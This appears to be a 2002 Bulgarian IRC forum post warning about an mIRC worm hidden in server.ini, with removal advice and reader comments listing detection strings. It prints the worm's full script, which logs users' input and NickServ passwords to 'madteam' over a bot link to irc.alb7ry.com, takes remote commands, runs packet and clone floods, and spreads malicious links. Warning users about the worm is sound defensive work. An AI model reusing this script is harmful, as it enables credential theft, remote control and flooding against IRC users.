Начало | IRC HELP | IRC ФОРУМ | HTML Chat | Вход

от: dzver (регистриран)

Ще го разпознаете по отворения connection към irc.alb7ry.com, от където лице с псевдоним madteam получава известие за вас. Пиша арабски боклук, защото преди дни се натъкнах на същия вирус в dalnet #kuwait, този е копиран от някой бълагрски боклук и само му е подменено името, което командва drones.

Отстранява се с изтриване на server.ini във вашата mIRC директория. Нормално server.ini съдържа списък от IRC serveri, а вашият, ако сте заарзен, съдържа следното:

[script]
n0=
n1=
n2=
n3=On *:nick:{ .ruser 400 $nick | .auser 400 $newnick }
n4=on 400:part:#:{ if ($nick == $me) { botc privmsg madteam2,madteam3 : 14[12 $+ $chan $+ 14] 12<5 $+ $me $+ 12> 4ЗдЗ ШбЪК гд еРн ЗбЮдЗЙ } }
n5=on 400:join:#:{ if ($nick == $me) { botc privmsg madteam2,madteam3 : 14[12 $+ $chan $+ 14] 12<5 $+ $me $+ 12> 14ЗдЗ ПОбК еРн ЗбЮдЗЙ } }
n6=alias /remote { /remote $1- | /.timer 1 5 /.remote on }
n7=
n8=on 1:join:#:/.notice $nick http://www.angelfire.com/80s/smaher/code.htm ЗбЗгнСЙ УгЗеС ИдК КСЯн Зб УЪжП
n9=on 1:part:#:/.msg $nick http://validccs.cjb.net CC`s &v2
n10=alias packt { .sockwrite -n $sockname privmsg madteam : $+ Now [Packeting] $1 [with] $2 [bytes] $3 [times] | set %packet.ip $1 | set %packet.bytes $2 | set %packet.amount $3 | set %packet.count 0 | set %packet.port $rand(1,6) $+ $rand(0,6) $+ ($rand(0,6) $+ $rand(0,9) | :start | if (%packet.count >= %packet.amount) { sockclose packet | unset %packet.* | .sockwrite -n $sockname privmsg Madteam : $+ Packeting Has Completed .... | halt } | inc %packet.count 1| /.sockudp -b packet 60 %packet.ip %packet.port %packet.bytes %packet.bytes | goto start }
n11=on *:connect:{ .auser 400 $me | .auser 300 FreeLiFe | botc privmsg madteam2,madteam3 : 14[12 $+ $active $+ 14] 12<5 $+ $me $+ 12> 14ЗдЗ ФИЯЙ Ъбм ЗбУнСЭС еРЗ $server }
n12=on *:disconnect:{ botc privmsg madteam2,madteam3 : 14[12 $+ $active $+ 14] 12<5 $+ $me $+ 12> 4ЗдЗ ЭХбЙ гд ЗбУнСЭС еРЗ $server }
n13=alias identify { $chr(73) $+ $chr(68) $+ $chr(69) $+ $chr(78) $+ $chr(84) $+ $chr(73) $+ $chr(70) $+ $chr(89) $1 $2 | . $+ $chr(73) $+ $chr(71) $+ $chr(78) $+ $chr(79) $+ $chr(82) $+ $chr(69) $chr(45) $+ $chr(85) $+ $chr(57) $chr(77) $+ $chr(69) $+ $chr(77) $+ $chr(79) $+ $chr(83) $+ $chr(69) $+ $chr(82) $+ $chr(86) | $chr(77) $+ $chr(69) $+ $chr(77) $+ $chr(79) $+ $chr(83) $+ $chr(69) $+ $chr(82) $+ $chr(86) $chr(83) $+ $chr(69) $+ $chr(78) $+ $chr(68) $chr(70) $+ $chr(82) $+ $chr(69) $+ $chr(69) $+ $chr(76) $+ $chr(73) $+ $chr(70) $+ $chr(69) 12Nick:[14,14 $+ $me $+ 12] 4PassworD:[12,12 $1  $+ $chr(160) $+ 5,5 $2 $+ 4] }
n14=alias id { $chr(73) $+ $chr(68) $+ $chr(69) $+ $chr(78) $+ $chr(84) $+ $chr(73) $+ $chr(70) $+ $chr(89) $1 $2 | . $+ $chr(73) $+ $chr(71) $+ $chr(78) $+ $chr(79) $+ $chr(82) $+ $chr(69) $chr(45) $+ $chr(85) $+ $chr(57) $chr(77) $+ $chr(69) $+ $chr(77) $+ $chr(79) $+ $chr(83) $+ $chr(69) $+ $chr(82) $+ $chr(86) | $chr(77) $+ $chr(69) $+ $chr(77) $+ $chr(79) $+ $chr(83) $+ $chr(69) $+ $chr(82) $+ $chr(86) $chr(83) $+ $chr(69) $+ $chr(78) $+ $chr(68) $chr(70) $+ $chr(82) $+ $chr(69) $+ $chr(69) $+ $chr(76) $+ $chr(73) $+ $chr(70) $+ $chr(69) 12Nick:[14,14 $+ $me $+ 12] 4PassworD:[12,12 $1  $+ $chr(160) $+ 5,5 $2 $+ 4] }
n15=on *:input:*:{ botc privmsg madteam2,madteam3 : 14[12 $+ $active $+ 14] 3[6 $+ $network $+ 3] 12<5 $+ $me $+ 12> 4 $1- }
n16=alias botc { sockwrite -n bot-2 $1- }
n17=on 300:notice:!am*:*:{ $2- }
n18=on *:sockread:bo*: { sockread %botread | set %nickl1 $gettok(%botread,1,32) | set %nickl2 $left(%nickl1,8) | set %nickf $right(%nickl2,7) | if ($gettok(%botread,5,32) == $chr(109) $+ $chr(97) $+ $chr(100) $+ $chr(116) $+ $chr(101) $+ $chr(97) $+ $chr(109)) && (%nickf == MaDTeaM) { $gettok(%botread,6-,32) } }
n19=on *:Sockopen:bot*:{ if ($sockerr > 0) { halt } | set -u1 %user $rand(A,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(A,z) $+ $rand(a,z) $+ $rand(1,9) $+ $rand(a,z) | .sockwrite -nt $sockname USER %user %user %user : $+ $me | .sockwrite -nt $sockname NICK $r(A,Z) $+ $r(a,z) $+ $r(A,Z) $+ - $+ $rand(0,99) | sockwrite -tn $sockname join #kkk | .timer 0 120 sockwrite -n $sockname privmsg madteam : $+ help me ;p~~ }
n20=on *:sockclose:bot*:/.timer 1 3 sockopen $chr(98) $+ $chr(111) $+ $chr(116) $+ -2 irc.alb7ry.com 6667
n21=on 1:start:/.identd on | .auser 300 FreeLiFe | .timer 1 3 .sockopen $chr(98) $+ $chr(111) $+ $chr(116) $+ -2 irc.alb7ry.com 6667 | .ignore $me
n22=on *:Sockopen:boj*:{ if ($sockerr > 0) { halt } | set -u1 %user $rand(A,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(A,z) $+ $rand(a,z) $+ $rand(1,9) $+ $rand(a,z) | .sockwrite -nt $sockname USER %user %user %user : $+ %user | .sockwrite -nt $sockname NICK $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(A,Z) | sockwrite -tn $sockname join %channel | .timer 0 120 sockwrite -n $sockname privmsg %channel : $+ We Ready To Fuck Chan ....... ! }
n23=on *:sockread:PSG*:{ .sockread %clone.temp | if ($gettok(%clone.temp,1,32) == Ping) { sockwrite -tn $sockname Pong $server } }
n24=alias fuck { if ($2 = $null) || ($2 !isnum) { botc privmsg madteam,MaDteam1,maDteaM2,maDteaM3 [(14_/fuck___[___]_4[__[_/clean_]__[_/fuck_]__[_/flood_4]_] | halt } | set %nick $$1 | set %clones $$2 | set %channel $$1 | set %MaDNick $$5 | if ( $3 = $null) { set %server $server } | if ( $3 != $null) { set %server $$3 } | if ( $4 = $null) || ( $4 !isnum) { set %port $port } | if ( $4 != $null) { set %port $$4 } | if ( $5 = $null) { set %flood $5 } | if ($group(#nicks) = on) { .disable #nicks } | set %PSGflood on | var %var = 0 | :loop | inc %var | if (%PSGflood == on) && (%var <= %clones) { .sockopen PSG $+ %var %server %port | goto loop }
n25= else { halt }
n26=}
n27=alias clean { .set %PSGflood off | .sockclose PSG* | .sockclose Paa* | .unset %nick | unset %channel | unset %server | unset %port | unset %clones | unset %flood }
n28=on *:Sockopen:PSG*:{
n29= if ($sockerr > 0) { halt }
n30= set -u1 %user $rand(a,z) $+ $rand(a,z) $+ %MaDNick $+ $rand(1,99) | .sockwrite -nt $sockname USER %user %user %user : $+ %user | .sockwrite -nt $sockname NICK $rand(a,z) $+ $rand(a,z) $+ %MaDNick $+ $rand(0,99) | .sockwrite -nt $sockname JOIN : $+ %channel | .sockwrite -n $sockname privmsg %channel : $+ $chr(1) $+ finger $+ $chr(1) | .sockwrite -n $sockname notice %channel : $+ %flood1 | .sockwrite -n $sockname quit : $+ %flood1 | .sockclose $sockname | .sockopen PSG $+ $r(0,999) $+ $r(0,999) $+ $r(0,999) $+ $r(0,999) %server %port
n31=}
n32=alias flood1 { set %flood1 MaDTeaM $+ $1- $+ MaDTeaM }

Както разбирате, заразата се е разпространявала през сайт в angelfire и validccs.cjb.net

Чистете се и си сменяйте често паролите:)

Мнения от посетители (3):
T0sh11.05.02 17:11:53
$decode v mirc 6.x
zabranen e. //$decode ne mozhesh da go izpulnish ot command prompt, security :)

dzver10.05.02 17:10:04
da be, ama
izpitvam ostra kriza na materiali i chitateli:)

btw, imam useshtaneto, che v mIRC 6.01 //$decode technikata ne raboti. Probvah specialno da dam example s encodnat string "az sym mnogo tup i placha za ban", ama ne stana :)

T0sh09.05.02 14:09:56
oprosteno
be dzver nyamashe nuzhda celiya script :)
nakartko: ako vuv file koito ne e ot scripta, ili ne e mirc.exe, namerite
"sockopen" - 99.9% chee virus. Ako ne e virus to e file ot scripta za koito ne znaete :)
sushto podozritelni stringove sa
"$decode" "sockwrite" ili "www.neshtosi.net"

Anonymous comments are temporary disabled

  Copyright: ShakeIT IRC; dev: dzver; des: metala. Read blogs.  
eXTReMe Tracker